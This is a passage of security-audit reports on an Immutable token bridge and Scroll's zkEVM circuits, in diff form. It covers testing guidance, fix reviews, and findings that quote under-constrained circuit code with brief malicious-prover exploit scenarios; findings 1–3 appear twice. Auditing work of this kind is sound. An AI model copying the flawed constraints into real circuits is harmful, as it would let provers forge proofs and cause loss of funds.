mapToken() must revert. If the rootToken address has already been mapped to a child token, mapToken() must revert. If the provided address is not the zero address and the address has not been mapped to a child token before, mapToken() must set the rootTokenToChildToken[rootToken] mapping to the address return value of the Clones.predictDeterministicAddress function, call the syncState function of the StateSender contract, emit the TokenMapped event, and return the child token address.
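A sketch of an implementation satisfying this specification; the salt derivation, the state-sync payload, and the event shape are illustrative assumptions, not the audited contract's actual code:

function mapToken(IERC20Metadata rootToken) external returns (address childToken) {
    require(address(rootToken) != address(0), "RootERC20Predicate: INVALID_TOKEN");
    require(
        rootTokenToChildToken[address(rootToken)] == address(0),
        "RootERC20Predicate: ALREADY_MAPPED"
    );
    // Predict the deterministic clone address on the child chain; this salt is illustrative.
    childToken = Clones.predictDeterministicAddress(
        childTokenTemplate,
        keccak256(abi.encodePacked(rootToken)),
        childERC20Predicate
    );
    rootTokenToChildToken[address(rootToken)] = childToken;
    stateSender.syncState(childERC20Predicate, abi.encode(rootToken, childToken));
    emit TokenMapped(address(rootToken), childToken);
    return childToken;
}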
Another complementary technique for defining a function specification, which can be especially useful for defining test cases, is the branching tree technique ( proposed by Paul Berg ), which is a tree-like structure based on all the execution paths, the contract state or function arguments that lead to each path, and the end result of each path. This type of specification can be useful when developing unit tests because it makes it easy to identify the execution paths, conditions, and edge cases that need to be tested. Constraints Specification Example Here is an example of a constraints specification. A RootERC20Predicate contract must be initialized in the same transaction as the deployment by calling the initialize function. RootERC20Predicate has two constraints that limit the contract’s operation: the stateSender address and the exitHelper address. The stateSender address must be defined during initialization and must implement the syncState function. If this address is not defined or is misconfigured, all calls to deposit or map tokens will fail, preventing the bridge from operating. The exitHelper address must be defined during initialization. If this address is not defined or is misconfigured, users will not be able to withdraw their bridged assets. Integration and Fork Testing Integration tests build on unit tests by testing how individual components integrate with each other or with third-party contracts. It can often be useful to run integration testing on a fork of the network to make the testing environment as close to production as possible and to minimize the use of mock contracts whose implementation can differ from the third-party contracts. We provide general recommendations on performing integration and fork testing below: ● Use the interaction specification to develop integration tests. Ensure that the integration tests aid in verifying the interaction’s specification. ● Identify valuable input data for the integration tests that can maximize code coverage and test potential edge cases. ● Use negative integration tests , similar to negative unit tests, to test common failure cases. ● Use fork testing to build on top of the integration testing suite. Fork testing will aid in testing third-party contract integrations and the proper configuration of the system once it is deployed. ● Enrich the forked integration testing suite with fuzzed values and call sequences (refer to the recommendations below). This will aid in increasing code coverage, validating system-level invariants, and identifying edge cases. Fuzz Testing ● Define system- and function-level invariants. Invariants are properties that should always hold within a system, component, or function. Defining invariants is a prerequisite for developing effective fuzz tests that can detect unexpected behavior. Developing a robust system specification will directly aid in the identification of system- and function-level invariants. ● Improve fuzz testing coverage.
When using Echidna, regularly review the coverage files generated at the end of a run to determine whether the property tests’ assertions are reached and what parts of the codebase are explored by the fuzzer. To improve the fuzzer’s exploration and increase the chances that it finds an unexpected edge case, avoid overconstraining the function arguments. ● Integrate fuzz testing into the CI/CD workflow. Continuous fuzz testing can help quickly identify any code changes that will result in a violation of a system property and can force developers to update the fuzz testing suite in parallel with the code. Running fuzz campaigns stochastically may cause a divergence between the operations in the code and the fuzz tests. ● Add comprehensive logging mechanisms to all fuzz tests to aid in debugging. Logging during smart contract fuzzing is crucial for understanding the state of the system when a system property is broken. Without logging, it is difficult to identify the arithmetic or operation that caused the failure. ● Enrich each fuzz test with comments explaining the preconditions and postconditions of the test. Strong fuzz testing requires well-defined preconditions (for guiding the fuzzer) and postconditions (for properly testing the invariants in question). Comments explaining the bounds on certain values and the importance of the system properties being tested will aid in testing suite maintenance and debugging efforts. Mutation Testing At a high level, mutation tests make several changes to each line of a target file and rerun the testing suite for each change. Changes that result in test failures indicate adequate test coverage, while changes that do not result in test failures indicate gaps in the test coverage. Although mutation testing is a slow process, it allows auditors to focus their review on areas of the codebase that are most likely to contain latent bugs, and it allows developers to identify and add missing tests. We recommend using two mutation tools, both of which can help detect redundant code, insufficient test coverage, incorrectly defined tests or conditions, and bugs in the underlying source code under test: ● Necessist performs mutation of the testing suite by iteratively removing lines in the test cases. ● universalmutator performs mutation of the underlying source code. E. Fix Review Results When undertaking a fix review, Trail of Bits reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not a comprehensive analysis of the system. On October 2, 2023, Trail of Bits reviewed the fixes and mitigations implemented by the Immutable team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, the Immutable team has resolved all five issues described in this report. For additional information, please see the Detailed Fix Review Results below. ID Title Status 1 Initialization functions vulnerable to front-running Resolved 2 Lack of lower and upper bounds for system parameters Resolved 3 RootERC20Predicate is incompatible with nonstandard ERC-20 tokens Resolved 4 Lack of event generation Resolved 5 Withdrawal queue can be forcibly activated to hinder bridge operation Resolved Detailed Fix Review Results TOB-IMM-1: Initialization functions vulnerable to front-running Resolved in commit 9156c04 through inline documentation. The Immutable team incorporated explanatory inline comments in both initialize functions.
These comments highlight the potential for front-running and propose preventive steps, such as calling initialize when TransparentUpgradeableProxy is deployed through its constructor or calling initialize post-deployment of TransparentUpgradeableProxy to check for possible front-running. TOB-IMM-2: Lack of lower and upper bounds for system parameters Resolved in commit 29251f9 through inline documentation. The Immutable team added descriptive inline comments for both the setWithdrawalDelay and setRateControlThreshold functions, outlining the potential risks associated with setting excessively high and low threshold values and outlining the strategies to mitigate these risks, such as monitoring and resetting the threshold values. TOB-IMM-3: RootERC20Predicate is incompatible with nonstandard ERC-20 tokens Resolved in commit 9b5a008 through inline documentation. The Immutable team added inline comments indicating that the deposit function is not compatible with nonstandard ERC-20 tokens that implement fees during transfers. TOB-IMM-4: Lack of event generation Resolved in commit 64f1a11 and commit b46f2cc . Both the setRateControlThreshold and setAllowedZone functions now incorporate the events emitted after the execution of the corresponding action. TOB-IMM-5: Withdrawal queue can be forcibly activated to hinder bridge operation Resolved in commit 7ff87f2 through inline documentation. The Immutable team incorporated inline comments in the RootERC20PredicateFlowRate contract to highlight the dangers of misconfigured flow rates, which could potentially be exploited by an attacker, and to outline the measures to avoid such configuration errors. F. Fix Review Status Categories The following table describes the statuses used to indicate whether an issue has been sufficiently addressed. Fix Status Status Description Undetermined The status of the issue was not determined during this engagement. Unresolved The issue persists and has not been resolved. Partially Resolved The issue persists but has been partially resolved. Resolved The issue has been sufficiently resolved. diff --git a/findings_newupdate/tob/2023-08-scroll-zkEVM-wave2-securityreview.txt b/findings_newupdate/tob/2023-08-scroll-zkEVM-wave2-securityreview.txt new file mode 100644 index 0000000..2f8b7f0 --- /dev/null +++ b/findings_newupdate/tob/2023-08-scroll-zkEVM-wave2-securityreview.txt @@ -0,0 +1,20 @@ +1. PoseidonLookup is not implemented Severity: Informational Difficulty: N/A Type: Testing Finding ID: TOB-SCROLL2-1 Target: src/gadgets/poseidon.rs Description Poseidon hashing is performed within the MPT circuit by performing lookups into a Poseidon table via the PoseidonLookup trait, shown in figure 1.1. /// Lookup represent the poseidon table in zkevm circuit pub trait PoseidonLookup { fn lookup_columns(&self) -> (FixedColumn, [AdviceColumn; 5]) { let (fixed, adv) = self.lookup_columns_generic(); (FixedColumn(fixed), adv.map(AdviceColumn)) } fn lookup_columns_generic(&self) -> (Column, [Column; 5]) { let (fixed, adv) = self.lookup_columns(); (fixed.0, adv.map(|col| col.0)) } } Figure 1.1: src/gadgets/poseidon.rs#11–21 This trait is not implemented by any types except the testing-only PoseidonTable shown in figure 1.2, which does not constrain its columns at all. 
#[cfg(test)] #[derive(Clone, Copy)] pub struct PoseidonTable { q_enable: FixedColumn, left: AdviceColumn, right: AdviceColumn, hash: AdviceColumn, control: AdviceColumn, head_mark: AdviceColumn, } #[cfg(test)] impl PoseidonTable { pub fn configure (cs: &mut ConstraintSystem) -> Self { let [hash, left, right, control, head_mark] = [0; 5].map(|_| AdviceColumn(cs.advice_column())); Self { left, right, hash, control, head_mark, q_enable: FixedColumn(cs.fixed_column()), } } Figure 1.2: src/gadgets/poseidon.rs#56–80 The rest of the codebase treats this trait as a black-box implementation, so this does not seem to cause correctness problems elsewhere. However, it does limit one’s ability to test some negative cases, and it makes the test coverage rely on the correctness of the PoseidonTable struct’s witness generation. Recommendations Short term, create a concrete implementation of the PoseidonLookup trait to enable full testing of the MPT circuit. Long term, ensure that all parts of the MPT circuit are tested with both positive and negative tests. +2. IsZeroGadget does not constrain the inverse witness when the value is zero Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-2 Target: src/gadgets/is_zero.rs Description The IsZeroGadget implementation allows for an arbitrary inverse_or_zero witness value when the value parameter is 0. The gadget returns 1 when value is 0; otherwise, it returns 0. The implementation relies on the existence of an inverse for when value is nonzero and on correctly constraining that value * (1 - value * inverse_or_zero) == 0. However, when value is 0, the constraint is immediately satisfied, regardless of the value of the inverse_or_zero witness. This allows an arbitrary value to be provided for that witness value. pub fn configure( cs: &mut ConstraintSystem, cb: &mut ConstraintBuilder, value: AdviceColumn, // TODO: make this a query once Query is clonable/copyable..... ) -> Self { let inverse_or_zero = AdviceColumn(cs.advice_column()); cb.assert_zero( "value is 0 or inverse_or_zero is inverse of value", value.current() * (Query::one() - value.current() * inverse_or_zero.current()), ); Self { value, inverse_or_zero, } } Figure 2.1: mpt-circuit/src/gadgets/is_zero.rs#48–62 Recommendations Short term, ensure that the circuit is deterministic by constraining inverse_or_zero to equal 0 when value is 0. Long term, document which circuits have nondeterministic witnesses; over time, constrain them so that all circuits have deterministic witnesses.
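A common way to satisfy the short-term recommendation is to add a second constraint that is symmetric in the two columns (a sketch of the standard technique, not code from the gadget): value * (1 - value * inverse_or_zero) == 0 and inverse_or_zero * (1 - value * inverse_or_zero) == 0. When value is 0, the second equation reduces to inverse_or_zero == 0; when value is nonzero, the first equation forces inverse_or_zero to be the field inverse of value. Together, the two constraints determine inverse_or_zero uniquely in both cases.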
+3. The MPT nonexistence proof gadget is missing constraints specified in the documentation Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-3 Target: src/gadgets/mpt_update/nonexistence_proof.rs Description The gadget for checking the consistency of nonexistence proofs is missing several constraints related to type 2 nonexistence proofs. The circuit specification includes constraints for the nonexistence of path proofs that are not included in the implementation. This causes the witness values to be unconstrained in some cases. For example, the following constraints are specified: ● other_key_hash should equal 0 when key does not equal other_key. ● other_leaf_data_hash should equal the hash of the empty node (pointed to by other_key). Neither of these constraints is enforced in the implementation, because the implementation imposes no explicit constraints for type 2 nonexistence proofs. Figure 3.1 shows that the circuit constrains these values only for type 1 proofs. pub fn configure ( cb: &mut ConstraintBuilder, value: SecondPhaseAdviceColumn, key: AdviceColumn, other_key: AdviceColumn, key_equals_other_key: IsZeroGadget, hash: AdviceColumn, hash_is_zero: IsZeroGadget, other_key_hash: AdviceColumn, other_leaf_data_hash: AdviceColumn, poseidon: &impl PoseidonLookup, ) { cb.assert_zero("value is 0 for empty node", value.current()); cb.assert_equal( "key_minus_other_key = key - other key", key_equals_other_key.value.current(), key.current() - other_key.current(), ); cb.assert_equal( "hash_is_zero input == hash", hash_is_zero.value.current(), hash.current(), ); let is_type_1 = !key_equals_other_key.current(); let is_type_2 = hash_is_zero.current(); cb.assert_equal( "Empty account is either type 1 xor type 2", Query::one(), Query::from(is_type_1.clone()) + Query::from(is_type_2), ); cb.condition(is_type_1, |cb| { cb.poseidon_lookup( "other_key_hash == h(1, other_key)", [Query::one(), other_key.current(), other_key_hash.current()], poseidon, ); cb.poseidon_lookup( "hash == h(key_hash, other_leaf_data_hash)", [ other_key_hash.current(), other_leaf_data_hash.current(), hash.current(), ], poseidon, ); }); Figure 3.1: mpt-circuit/src/gadgets/mpt_update/nonexistence_proof.rs#7–54 The Scroll team has stated that this is a specification error and that the missing constraints do not impact the soundness of the circuit. Recommendations Short term, update the specification to remove the description of these constraints; ensure that the documentation is kept updated. Long term, add positive and negative tests for both types of nonexistence proofs. +4. Discrepancies between the MPT circuit specification and implementation Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-4 Target: Several files Description The MPT circuit implementation is not faithful to the circuit specification in many areas and does not contain comments for the constraints that are either missing from the implementation or that diverge from those in the specification. The allowed segment transitions depend on the proof type. For the NonceChanged proof type, the specification states that the Start segment type can transition to Start and that the AccountLeaf0 segment type also can transition to Start. However, neither of these paths is allowed in the implementation. MPTProofType::NonceChanged | MPTProofType::BalanceChanged | MPTProofType::CodeSizeExists | MPTProofType::CodeHashExists => [ ( SegmentType::Start, vec![ SegmentType::AccountTrie, // mpt has > 1 account SegmentType::AccountLeaf0, // mpt has <= 1 account ], ), ( SegmentType::AccountTrie, vec![ SegmentType::AccountTrie, SegmentType::AccountLeaf0, SegmentType::Start, // empty account proof ], ), (SegmentType::AccountLeaf0, vec![SegmentType::AccountLeaf1]), (SegmentType::AccountLeaf1, vec![SegmentType::AccountLeaf2]), (SegmentType::AccountLeaf2, vec![SegmentType::AccountLeaf3]), (SegmentType::AccountLeaf3, vec![SegmentType::Start]), Figure 4.1: mpt-circuit/src/gadgets/mpt_update/segment.rs#20– Figure 4.2: Part of the MPT specification (spec/mpt-proof.md#L318-L328) The transitions allowed for the PoseidonCodeHashExists proof type also do not match: the specification states that it has the same transitions as the NonceChanged proof type, but the implementation has different transitions. The key depth direction checks also do not match the specification.
The specification states that the depth parameter should be used but the implementation uses depth - 1. cb.condition(is_trie.clone(), |cb| { cb.add_lookup( "direction is correct for key and depth", [key.current(), depth.current() - 1, direction.current()], key_bit.lookup(), ); cb.assert_equal( "depth increases by 1 in trie segments", depth.current(), depth.previous() + 1, ); cb.condition(path_type.current_matches(&[PathType::Common]), |cb| { cb.add_lookup( "direction is correct for other_key and depth", [ other_key.current(), depth.current() - 1, Figure 4.3: mpt-circuit/src/gadgets/mpt_update.rs#188– Figure 4.4: Part of the MPT specification (spec/mpt-proof.md#L279-L282) Finally, the specification states that when a segment type is a non-trie type, the value of key should be constrained to 0, but this constraint is omitted from the implementation. cb.condition(!is_trie, |cb| { cb.assert_zero("depth is 0 in non-trie segments", depth.current()); }); Figure 4.5: mpt-circuit/src/gadgets/mpt_update.rs#212–214 Figure 4.6: Part of the MPT specification (spec/mpt-proof.md#L284-L286) Recommendations Short term, review the specification and ensure its consistency. Match the implementation with the specification, and document possible optimizations that remove constraints, detailing why they do not cause soundness issues. Long term, include both positive and negative tests for all edge cases in the specification. +5. Redundant lookups in the Word RLC circuit Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-5 Target: src/gadgets/mpt_update/word_rlc.rs Description The Word RLC circuit has two redundant lookups into the BytesLookup table. The Word RLC circuit combines the random linear combination (RLC) for the lower and upper 16 bytes of a word into a single RLC value. For this, it checks that the lower and upper word segments are 16 bytes by looking into the BytesLookup table, and it checks that their RLCs are correctly computed by looking into the RlcLookup table. However, the lookup into the RlcLookup table will also ensure that the lower and upper segments of the word have the correct 16 bytes, making the first two lookups redundant. pub fn configure( cb: &mut ConstraintBuilder, [word_hash, high, low]: [AdviceColumn; 3], [rlc_word, rlc_high, rlc_low]: [SecondPhaseAdviceColumn; 3], poseidon: &impl PoseidonLookup, bytes: &impl BytesLookup, rlc: &impl RlcLookup, randomness: Query, ) { cb.add_lookup( "old_high is 16 bytes", [high.current(), Query::from(15)], bytes.lookup(), ); cb.add_lookup( "old_low is 16 bytes", [low.current(), Query::from(15)], bytes.lookup(), ); cb.poseidon_lookup( "word_hash = poseidon(high, low)", [high.current(), low.current(), word_hash.current()], poseidon, ); cb.add_lookup( "rlc_high = rlc(high) and high is 16 bytes", [high.current(), Query::from(15), rlc_high.current()], rlc.lookup(), ); cb.add_lookup( "rlc_low = rlc(low) and low is 16 bytes", [low.current(), Query::from(15), rlc_low.current()], rlc.lookup(), Figure 5.1: mpt-circuit/src/gadgets/mpt_update/word_rlc.rs#16–49 Although the WordRLC::configure function receives two different lookup objects, bytes and rlc, they are instantiated with the same concrete lookup: let mpt_update = MptUpdateConfig::configure( cs, &mut cb, poseidon, &key_bit, &byte_representation, &byte_representation, &rlc_randomness, &canonical_representation, ); Figure 5.2: mpt-circuit/src/mpt.rs#60–69 We also note that the labels refer to the upper and lower bytes as old_high and old_low instead of just high and low. 
Recommendations Short term, determine whether both the BytesLookup and RlcLookup tables are needed for this circuit, and refactor the circuit accordingly, removing the redundant constraints. Long term, review the codebase for duplicated or redundant constraints using manual and automated methods. +6. The NonceChanged configuration circuit does not constrain the new nonce value Severity: High Difficulty: Low Type: Cryptography Finding ID: TOB-SCROLL2-6 Target: src/gadgets/mpt_update.rs Description The NonceChanged configuration circuit does not constrain the config.new_value parameter to be 8 bytes. Instead, there is a duplicated constraint for config.old_value: SegmentType::AccountLeaf3 => { cb.assert_zero("direction is 0", config.direction.current()); let old_code_size = (config.old_hash.current() - config.old_value.current()) * Query::Constant(F::from(1 << 32).square().invert().unwrap()); let new_code_size = (config.new_hash.current() - config.new_value.current()) * Query::Constant(F::from(1 << 32).square().invert().unwrap()); cb.condition( config.path_type.current_matches(&[PathType::Common]), |cb| { cb.add_lookup( "old nonce is 8 bytes", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); cb.add_lookup( "new nonce is 8 bytes", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); Figure 6.1: mpt-circuit/src/gadgets/mpt_update.rs#1209–1228 This means that a malicious prover could update the Account node with a value of arbitrary length for the Nonce and Codesize parameters. The same constraint (with a correct label but incorrect value) is used in the ExtensionNew path type: cb.condition( config.path_type.current_matches(&[PathType::ExtensionNew]), |cb| { cb.add_lookup( "new nonce is 8 bytes", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); Figure 6.2: mpt-circuit/src/gadgets/mpt_update.rs#1241–1248 Exploit Scenario A malicious prover uses the NonceChanged proof to update the nonce with a larger-than-expected value. Recommendations Short term, enforce the constraint for the config.new_value witness. Long term, add positive and negative testing of the edge cases present in the specification. For both the Common and ExtensionNew path types, there should be a negative test that fails because it changes the new nonce to a value larger than 8 bytes. Use automated testing tools like Semgrep to find redundant and duplicate constraints, as these could indicate that a constraint is incorrect. +7. The Copy circuit does not fully enforce the tag values Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-7 Target: src/copy_circuit/copy_gadgets.rs Description The Copy table includes a tag column that indicates the type of data for that particular row. However, the Copy circuit tag validation function does not fully ensure that the tag matches one of the predefined tag values. The implementation uses the copy_gadgets::constrain_tag function to bind the is_precompiled, is_tx_calldata, is_bytecode, is_memory, and is_tx_log witnesses to the actual tag value. However, the code does not ensure that exactly one of these Boolean values is true.
#[allow(clippy::too_many_arguments)] pub fn constrain_tag( meta: &mut ConstraintSystem, q_enable: Column, tag: BinaryNumberConfig, is_precompiled: Column, is_tx_calldata: Column, is_bytecode: Column, is_memory: Column, is_tx_log: Column, ) { meta.create_gate("decode tag", |meta| { let enabled = meta.query_fixed(q_enable, CURRENT); let is_precompile = meta.query_advice(is_precompiled, CURRENT); let is_tx_calldata = meta.query_advice(is_tx_calldata, CURRENT); let is_bytecode = meta.query_advice(is_bytecode, CURRENT); let is_memory = meta.query_advice(is_memory, CURRENT); let is_tx_log = meta.query_advice(is_tx_log, CURRENT); let precompiles = sum::expr([ tag.value_equals( CopyDataType::Precompile(PrecompileCalls::Ecrecover), CURRENT, )(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Sha256), CURRENT)(meta), tag.value_equals( CopyDataType::Precompile(PrecompileCalls::Ripemd160), CURRENT, )(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Identity), CURRENT)(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Modexp), CURRENT)(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Bn128Add), CURRENT)(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Bn128Mul), CURRENT)(meta), tag.value_equals( CopyDataType::Precompile(PrecompileCalls::Bn128Pairing), CURRENT, )(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Blake2F), CURRENT)(meta), ]); vec![ // Match boolean indicators to their respective tag values. enabled.expr() * (is_precompile - precompiles), enabled.expr() * (is_tx_calldata - tag.value_equals(CopyDataType::TxCalldata, CURRENT)(meta)), enabled.expr() CURRENT)(meta)), * (is_bytecode - tag.value_equals(CopyDataType::Bytecode, enabled.expr() * (is_memory - tag.value_equals(CopyDataType::Memory, CURRENT)(meta)), enabled.expr() * (is_tx_log - tag.value_equals(CopyDataType::TxLog, CURRENT)(meta)), ] }); } Figure 7.1: copy_circuit/copy_gadgets.rs#13–62 In fact, the tag value could equal CopyDataType::RlcAcc, as in the SHA3 gadget. The CopyDataType::Padding value is also not currently matched. In the current state of the codebase, this issue does not appear to cause any soundness issues because the lookups into the Copy table either use a statically set source and destination tag or, as in the case of precompiles, the value is correctly bounded and does not pose an avenue of attack for a malicious prover. We also observe that the Copy circuit specification mentions a witness value for the is_rlc_acc case, but this is not reflected in the code. Recommendations Short term, ensure that the tag column is fully constrained. Review the circuit specification and match the implementation with the specification, documenting possible optimizations that remove constraints and detailing why they do not cause soundness issues. Long term, include negative tests for an unintended tag value. +8. The “invalid creation” error handling circuit is unconstrained Severity: High Difficulty: Medium Type: Cryptography Finding ID: TOB-SCROLL2-8 Target: evm_circuit/execution/error_invalid_creation_code.rs Description The “invalid creation” error handling circuit does not constrain the first byte of the actual memory to be 0xef as intended. This allows a malicious prover to redirect the EVM execution to a halt after the CREATE opcode is called, regardless of the memory value. The ErrorInvalidCreationCodeGadget circuit was updated to accommodate the memory addressing optimizations. 
However, in doing so, the first_byte witness value that was bound to the memory’s first byte is no longer bound to it. Therefore, a malicious prover can always satisfy the circuit constraints, even if they are not in an error state after the CREATE opcode is called. fn configure(cb: &mut EVMConstraintBuilder) -> Self { let opcode = cb.query_cell(); let first_byte = cb.query_cell(); //let address = cb.query_word_rlc(); let offset = cb.query_word_rlc(); let length = cb.query_word_rlc(); let value_left = cb.query_word_rlc(); cb.stack_pop(offset.expr()); cb.stack_pop(length.expr()); cb.require_true("is_create is true", cb.curr.state.is_create.expr()); let address_word = MemoryWordAddress::construct(cb, offset.clone()); // lookup memory for first word cb.memory_lookup( 0.expr(), address_word.addr_left(), value_left.expr(), value_left.expr(), None, ); // let first_byte = value_left.cells[address_word.shift()]; // constrain first byte is 0xef let is_first_byte_invalid = IsEqualGadget::construct(cb, first_byte.expr(), 0xef.expr()); cb.require_true( "is_first_byte_invalid is true", is_first_byte_invalid.expr(), ); Figure 8.1: evm_circuit/execution/error_invalid_creation_code.rs#36–67 Exploit Scenario A malicious prover generates two different proofs for the same transaction, one leading to the error state, and the other successfully executing the CREATE opcode. Distributing these proofs to two ends of a bridge leads to state divergence and a loss of funds. Recommendations Short term, bind the first_byte witness value to the memory value; ensure that the successful CREATE end state checks that the first byte is different from 0xef. Long term, investigate ways to generate malicious traces that could be added to the test suite; every time a new soundness issue is found, create such a malicious trace and add it to the test suite. +9. The OneHot primitive allows more than one value at once Severity: High Difficulty: Low Type: Cryptography Finding ID: TOB-SCROLL2-9 Target: constraint_builder/binary_column.rs Description The OneHot primitive uses BinaryQuery values as witness values. However, despite their name, these values are not constrained to be Boolean values, allowing a malicious prover to choose more than one “hot” value in the data structure. impl OneHot { pub fn configure( cs: &mut ConstraintSystem, cb: &mut ConstraintBuilder, ) -> Self { let mut columns = HashMap::new(); for variant in Self::nonfirst_variants() { columns.insert(variant, cb.binary_columns::<1>(cs)[0]); } let config = Self { columns }; cb.assert( "sum of binary columns in OneHot is 0 or 1", config.sum(0).or(!config.sum(0)), ); config } Figure 9.1: mpt-circuit/src/gadgets/one_hot.rs#14–30 The reason the BinaryQuery values are not constrained to be Boolean is because the BinaryColumn configuration does not constrain the advice values to be Boolean, and the configuration is simply a type wrapper around the Column type. This provides no guarantees to the users of this API, who might assume that these values are guaranteed to be Boolean. pub fn configure( cs: &mut ConstraintSystem, _cb: &mut ConstraintBuilder, ) -> Self { let advice_column = cs.advice_column(); // TODO: constrain to be binary here... 
+1. PoseidonLookup is not implemented
Severity: Informational
Difficulty: N/A
Type: Testing
Finding ID: TOB-SCROLL2-1
Target: src/gadgets/poseidon.rs

Description
Poseidon hashing is performed within the MPT circuit by performing lookups into a Poseidon table via the PoseidonLookup trait, shown in figure 1.1.

/// Lookup represent the poseidon table in zkevm circuit
pub trait PoseidonLookup {
    fn lookup_columns(&self) -> (FixedColumn, [AdviceColumn; 5]) {
        let (fixed, adv) = self.lookup_columns_generic();
        (FixedColumn(fixed), adv.map(AdviceColumn))
    }
    fn lookup_columns_generic(&self) -> (Column<Fixed>, [Column<Advice>; 5]) {
        let (fixed, adv) = self.lookup_columns();
        (fixed.0, adv.map(|col| col.0))
    }
}

Figure 1.1: src/gadgets/poseidon.rs#11–21

This trait is not implemented by any types except the testing-only PoseidonTable shown in figure 1.2, which does not constrain its columns at all.

#[cfg(test)]
#[derive(Clone, Copy)]
pub struct PoseidonTable {
    q_enable: FixedColumn,
    left: AdviceColumn,
    right: AdviceColumn,
    hash: AdviceColumn,
    control: AdviceColumn,
    head_mark: AdviceColumn,
}

#[cfg(test)]
impl PoseidonTable {
    pub fn configure(cs: &mut ConstraintSystem<F>) -> Self {
        let [hash, left, right, control, head_mark] =
            [0; 5].map(|_| AdviceColumn(cs.advice_column()));
        Self {
            left,
            right,
            hash,
            control,
            head_mark,
            q_enable: FixedColumn(cs.fixed_column()),
        }
    }

Figure 1.2: src/gadgets/poseidon.rs#56–80

The rest of the codebase treats this trait as a black-box implementation, so this does not seem to cause correctness problems elsewhere. However, it does limit one's ability to test some negative cases, and it makes the test coverage rely on the correctness of the PoseidonTable struct's witness generation.

Recommendations
Short term, create a concrete implementation of the PoseidonLookup trait to enable full testing of the MPT circuit. Long term, ensure that all parts of the MPT circuit are tested with both positive and negative tests.
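As a sketch of the short-term recommendation, the testing-only table could be given a concrete trait implementation. The column ordering below is an assumption and would have to match the layout of the real Poseidon table in the zkevm circuit.

// Sketch only: a concrete PoseidonLookup implementation for the testing-only
// PoseidonTable. The column order is an assumption; it must be checked
// against the zkevm circuit's Poseidon table layout.
#[cfg(test)]
impl PoseidonLookup for PoseidonTable {
    fn lookup_columns(&self) -> (FixedColumn, [AdviceColumn; 5]) {
        (
            self.q_enable,
            [self.hash, self.left, self.right, self.control, self.head_mark],
        )
    }
}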
+2. IsZeroGadget does not constrain the inverse witness when the value is zero
Severity: Informational
Difficulty: N/A
Type: Cryptography
Finding ID: TOB-SCROLL2-2
Target: src/gadgets/is_zero.rs

Description
The IsZeroGadget implementation allows for an arbitrary inverse_or_zero witness value when the value parameter is 0. The gadget returns 1 when value is 0; otherwise, it returns 0. The implementation relies on the existence of an inverse for when value is nonzero and on correctly constraining that value * (1 - value * inverse_or_zero) == 0. However, when value is 0, the constraint is immediately satisfied, regardless of the value of the inverse_or_zero witness. This allows an arbitrary value to be provided for that witness value.

pub fn configure(
    cs: &mut ConstraintSystem<F>,
    cb: &mut ConstraintBuilder<F>,
    value: AdviceColumn, // TODO: make this a query once Query is clonable/copyable.....
) -> Self {
    let inverse_or_zero = AdviceColumn(cs.advice_column());
    cb.assert_zero(
        "value is 0 or inverse_or_zero is inverse of value",
        value.current() * (Query::one() - value.current() * inverse_or_zero.current()),
    );
    Self {
        value,
        inverse_or_zero,
    }
}

Figure 2.1: mpt-circuit/src/gadgets/is_zero.rs#48–62

Recommendations
Short term, ensure that the circuit is deterministic by constraining inverse_or_zero to equal 0 when value is 0. Long term, document which circuits have nondeterministic witnesses; over time, constrain them so that all circuits have deterministic witnesses.
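One way to implement the short-term recommendation is a second constraint that forces inverse_or_zero to 0 whenever value is 0; a minimal sketch using the constraint-builder API shown in figure 2.1:

// Sketch only. Together with the existing constraint, this makes the witness
// deterministic: when value == 0 the product reduces to inverse_or_zero
// itself, forcing it to 0; when value != 0 the existing constraint already
// forces value * inverse_or_zero == 1, so this product vanishes.
cb.assert_zero(
    "inverse_or_zero is 0 when value is 0",
    inverse_or_zero.current()
        * (Query::one() - value.current() * inverse_or_zero.current()),
);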
+3. The MPT nonexistence proof gadget is missing constraints specified in the documentation
Severity: Informational
Difficulty: N/A
Type: Cryptography
Finding ID: TOB-SCROLL2-3
Target: src/gadgets/mpt_update/nonexistence_proof.rs

Description
The gadget for checking the consistency of nonexistence proofs is missing several constraints related to type 2 nonexistence proofs. The circuit specification includes constraints for nonexistence path proofs that are not included in the implementation. This causes the witness values to be unconstrained in some cases. For example, the following constraints are specified:

● other_key_hash should equal 0 when key does not equal other_key.
● other_leaf_data_hash should equal the hash of the empty node (pointed to by other_key).

Neither of these constraints is enforced in the implementation, because it imposes no explicit constraints for type 2 nonexistence proofs. Figure 3.1 shows that the circuit constrains these values only for type 1 proofs.

pub fn configure(
    cb: &mut ConstraintBuilder<F>,
    value: SecondPhaseAdviceColumn,
    key: AdviceColumn,
    other_key: AdviceColumn,
    key_equals_other_key: IsZeroGadget,
    hash: AdviceColumn,
    hash_is_zero: IsZeroGadget,
    other_key_hash: AdviceColumn,
    other_leaf_data_hash: AdviceColumn,
    poseidon: &impl PoseidonLookup,
) {
    cb.assert_zero("value is 0 for empty node", value.current());
    cb.assert_equal(
        "key_minus_other_key = key - other key",
        key_equals_other_key.value.current(),
        key.current() - other_key.current(),
    );
    cb.assert_equal(
        "hash_is_zero input == hash",
        hash_is_zero.value.current(),
        hash.current(),
    );
    let is_type_1 = !key_equals_other_key.current();
    let is_type_2 = hash_is_zero.current();
    cb.assert_equal(
        "Empty account is either type 1 xor type 2",
        Query::one(),
        Query::from(is_type_1.clone()) + Query::from(is_type_2),
    );
    cb.condition(is_type_1, |cb| {
        cb.poseidon_lookup(
            "other_key_hash == h(1, other_key)",
            [Query::one(), other_key.current(), other_key_hash.current()],
            poseidon,
        );
        cb.poseidon_lookup(
